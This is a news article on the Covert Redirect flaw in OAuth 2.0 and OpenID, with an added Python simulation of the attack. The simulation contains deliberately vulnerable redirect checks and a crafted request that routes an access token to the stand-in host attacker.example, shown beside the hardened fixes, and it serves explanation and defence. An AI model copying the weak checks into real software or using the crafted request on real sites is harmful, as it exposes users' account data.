Is 'Covert Redirect' Flaw a Big Deal?

A newly reported flaw in the way websites implement two widely used open authorization and sign-in standards, which has been named Covert Redirect, is gaining attention in the aftermath of the widely publicized Heartbleed bug. But security experts say this newly identified bug doesn't appear to pose as big a risk as Heartbleed.

The flaw affects OAuth 2.0 and OpenID, standards that let users sign in to online services using an existing identity from another site, such as Facebook, Google or Yahoo. Because of the flaw, an attacker could potentially intercept the token issued during the OAuth or OpenID sign-in and use it to read whatever information the user agreed to share, such as their e-mail address. But so far, there's no reported evidence that attackers have capitalized on the flaw.

Compared to Heartbleed, which exposed a vulnerability in OpenSSL, a widely used cryptographic library that provides communication security and privacy over the Internet, the Covert Redirect flaw is relatively isolated, says Al Pascual, a senior fraud and security analyst at Javelin Strategy and Research.

"While the use of OAuth and OpenID are pervasive across the Web, this bug is not anywhere near as worrisome as Heartbleed," he says.

Still, sites that rely on OAuth 2.0 and OpenID need to make their users aware of the potential risks.

Covert Redirect

The Covert Redirect flaw was first reported, and named, by security researcher Wang Jing, a PhD student in mathematics at the Nanyang Technological University in Singapore, who says the flaw in OAuth 2.0 and OpenID impacts all users of the authorization standards, including Facebook, Google, Yahoo, LinkedIn and Microsoft, among others.

For the exploit to work, an Internet user would have to visit a malicious site or application and then log in using the OAuth 2.0 or OpenID process, says Andreas Baumhof, chief technology officer at anti-fraud vendor ThreatMetrix.

Say, for instance, the user logged into a website using Facebook credentials. Once the OAuth 2.0 or OpenID process was completed, a cyber-attacker, taking advantage of the flaw, could redirect the token used by OAuth 2.0 or OpenID to access information on Facebook, granting the attacker access to whatever information the user has shared, Baumhof says.

How Big Is The Risk?

Security firm Symantec, in a May 3 blog, notes that while Heartbleed could be exploited just by issuing requests to unpatched servers, Covert Redirect requires an attacker to find a susceptible application as well as acquire interaction and permissions from users.

"Covert Redirect is a security flaw, not a vulnerability," Symantec says. "It takes advantage of third-party clients susceptible to an open redirect."

For the flaw to be exploited, Symantec says, a user would have to grant permissions to a susceptible application in order for the access token to be compromised. "An attacker may then obtain user account data which could be used for further malicious purposes."

Yet Baumhof of ThreatMetrix says the flaw poses some concern, because a fix is not straightforward. Similarly, Symantec notes: "Do not expect a patch. It is up to the service providers to secure their own implementations to effectively address the Covert Redirect flaw."

Mitigating the Risks

Organizations and users can take steps to mitigate the risks involved with the Covert Redirect flaw.

Symantec says Internet users need to be careful about what applications and websites they're accessing through OAuth and OpenID. Application developers also need to be mindful of open redirects on their websites. "It is important to lock down open redirects on your website," Symantec says. "Service providers also recommend application developers create a whitelist of OAuth redirect URLs."
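The chain Baumhof describes above, and the two fixes Symantec recommends here, wired together as an added example. This is not code from the article, from Wang Jing or from any provider; the hostnames, the registered callback URL and the token are constructed, and the model assumes the implicit grant, where the provider returns the access token in the URL fragment. It shows the two weaknesses that combine into Covert Redirect, a provider that accepts any redirect_uri on the client's registered domain and a client page that bounces visitors to whatever URL it is handed, beside the hardened versions: an exact-match whitelist of redirect URIs on the provider side and a locked-down redirect on the client side.

```python
"""Covert Redirect, modelled end to end.  Added example, not code from the
article or from any OAuth provider.  All hosts, URLs and the token are
constructed for the simulation."""
from typing import Callable, Optional
from urllib.parse import parse_qs, urlsplit

# Constructed registration data for a hypothetical OAuth client.
CLIENT_HOST = "client.example"
REGISTERED_REDIRECT_URIS = {"https://client.example/oauth/callback"}

# Constructed attacker endpoint and token.
ATTACKER = "https://attacker.example/collect"
TOKEN = "tok_constructed_123"


def loose_redirect_uri_ok(redirect_uri: str) -> bool:
    """Weak provider-side check: any HTTPS URL on the registered host passes.
    This is the behaviour Covert Redirect relies on."""
    parts = urlsplit(redirect_uri)
    return parts.scheme == "https" and parts.netloc == CLIENT_HOST


def strict_redirect_uri_ok(redirect_uri: str) -> bool:
    """Hardened provider-side check: exact string match against the
    registered whitelist, so a crafted path or query never passes."""
    return redirect_uri in REGISTERED_REDIRECT_URIS


def provider_authorize(redirect_uri: str, token: str,
                       check: Callable[[str], bool]) -> Optional[str]:
    """Provider's response after the user consents: with the implicit grant
    the token rides in the fragment of the redirect_uri.  Returns None when
    the redirect_uri fails the check."""
    if not check(redirect_uri):
        return None
    return f"{redirect_uri}#access_token={token}"


def _with_fragment(location: str, fragment: str) -> str:
    # Browsers carry the original fragment across a 302, so the token follows
    # the redirect even though the server never sees or sends it.
    return f"{location}#{fragment}" if fragment else location


def open_redirect_handler(url: str) -> str:
    """Client-side open redirect: /go?next=<anything> sends the browser to
    <anything>.  Returns the URL the browser ends up on."""
    parts = urlsplit(url)
    target = parse_qs(parts.query).get("next", [""])[0]
    return _with_fragment(target, parts.fragment)


def safe_redirect_handler(url: str) -> str:
    """Locked-down redirect: only a same-site path is honoured; absolute URLs
    and scheme-relative forms such as //host or /\\host fall back to '/'."""
    parts = urlsplit(url)
    target = parse_qs(parts.query).get("next", [""])[0]
    if not target.startswith("/") or target.startswith(("//", "/\\")):
        target = "/"
    return _with_fragment(f"https://{CLIENT_HOST}{target}", parts.fragment)


def attack(check: Callable[[str], bool],
           handler: Callable[[str], str]) -> Optional[str]:
    """Attacker's crafted authorization request: redirect_uri points at the
    client's redirect page with next= set to the attacker's server.  Returns
    the URL the victim's browser lands on, or None if the provider refuses."""
    crafted = f"https://{CLIENT_HOST}/go?next={ATTACKER}"
    response = provider_authorize(crafted, TOKEN, check)
    if response is None:
        return None
    return handler(response)


if __name__ == "__main__":
    for check, handler in [(loose_redirect_uri_ok, open_redirect_handler),
                           (strict_redirect_uri_ok, open_redirect_handler),
                           (loose_redirect_uri_ok, safe_redirect_handler)]:
        print(check.__name__, "+", handler.__name__, "->",
              attack(check, handler))
```

With the loose check and the open redirect the token lands on attacker.example; the strict check stops the provider from issuing a token to the crafted redirect_uri at all, and the locked-down redirect keeps the token on the client's own host even when the provider's check is loose. Either fix alone breaks the chain, which is why both the provider and the application developer are named as responsible in the article.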

Pascual adds: "As long as users do not interact with malicious links and/or websites, the risk is negligible. Users should be on the lookout for an increase in unsolicited e-mails that purport to be from Facebook or other sites that utilize Facebook credentials for single sign-on."

Sites that rely on the OAuth 2.0 and OpenID credentialing process should make their users aware of the vulnerability and provide recommendations for how to avoid having their sensitive information compromised, Pascual says.

About the Author

Roman is the former News Writer for Information Security Media Group. Having worked for multiple publications at The College of New Jersey, including the College's newspaper "The Signal" and alumni magazine, Roman has experience in journalism, copy editing and communications.
